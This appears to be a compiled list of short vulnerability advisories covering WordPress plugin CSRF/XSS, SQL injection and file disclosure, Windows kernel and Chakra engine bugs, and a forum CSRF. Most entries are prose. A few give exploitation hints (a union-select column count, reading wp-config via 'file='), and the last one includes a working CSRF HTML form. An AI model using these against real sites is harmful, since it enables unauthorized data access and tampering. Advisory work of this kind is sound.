Plugin implements AJAX action `cms_tpv_add_page` which calls back the function `cms_tpv_add_page`. The later does not implement any anti-CSRF controls or security checks. Leveraging a CSRF attack an attacker could perform a Persistent XSS attack if the victim has administrative rights (see PoC). The AJAX action is a privileged one so it's only available for registered users. Even so it doesn't implement any capabilities checks so it's available to all users no matter the access level. This could allow any registered user to create arbitrary posts no matter the access level.
Plugin implements AJAX action `acx_asmw_saveorder` which calls back the function `acx_asmw_saveorder_callback`. The later does not implement any anti-CSRF controls thus allowing a malicious actor to perform an attack that could update plugin specific option `social_widget_icon_array_order`. Leveraging a CSRF could lead to a Persistent XSS (see PoC). Payload will be served when a user with the right privileges visits plugin's settings page (`wp-admin/admin.php?page=Acurax-Social-Widget-Settings`).
The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection via the event_id parameter to event.php. To exploit, union select 29 columns. User can use 2 or 25 for information gathering.
Unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file.
A vulnerability in the nt!NtQuerySystemInformation system call with the 138 information class can be exploited to disclose portions of uninitialized kernel pool memory to user-mode clients. The issue is caused by the internal nt!ExpQueryMemoryTopologyInformation function not properly initializing the output buffer. On Windows 10 version 1709 32-bit systems, the output size is 0x70 (112) bytes and 12 bytes in three 4-byte chunks of consecutive memory are not properly initialized and contain leftover data from the kernel pool. The issue can be reproduced by running a proof-of-concept program on a system with the Special Pools mechanism enabled for ntoskrnl.exe.
Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values. The proof of concept code shows that when the function opt() is called, the variable tmp is allocated to the stack and when the function main() is called, the variable tmp is dereferenced which leads to uninitialized stack values.
Chakra, the JavaScript engine in Microsoft Edge, is vulnerable to an out-of-bounds read vulnerability. This vulnerability occurs when a variable is initialized with a double constant, but the double constant table fails to find the int value. This leads to an out-of-bounds read, which can be exploited to gain access to sensitive information.
This vulnerability occurs when optimizations for memory operations leave empty loops which can break the control flow. This can be exploited by an attacker to cause unexpected behavior in the program. In the PoC, the empty loop is removed without considering branches, which causes the program to print out 1234 instead of 0.
A vulnerability exists in the JavascriptMath::MaxInAnArray optimization method, which takes the original method 'Math.max' as the first parameter and the arguments object as the second parameter. If the arguments object can't be handled by the method, it explicitly calls the original method 'Math.max'. However, it doesn't check if the property 'Math.max' has changed, so a user defined JavaScript function can be called without updating 'ImplicitCallFlags'.
Any registered user can delete topics and comments in forum without having admin access. Save the below code in html format, Once victim is logged into account. Use the below code. <form method="post" action="https://www.site.com/forum/vanilla/discussion/dismissannouncement?discussionid=3709"><input name=" DeliveryType" value="VIEW" class="input" type="hidden"><input name=" DeliveryMethod" value="JSON" class="input" type="hidden"> <li><label><br></label><input value="Send" class="submit" type="submit"></li> </ul></form>
Services By CQR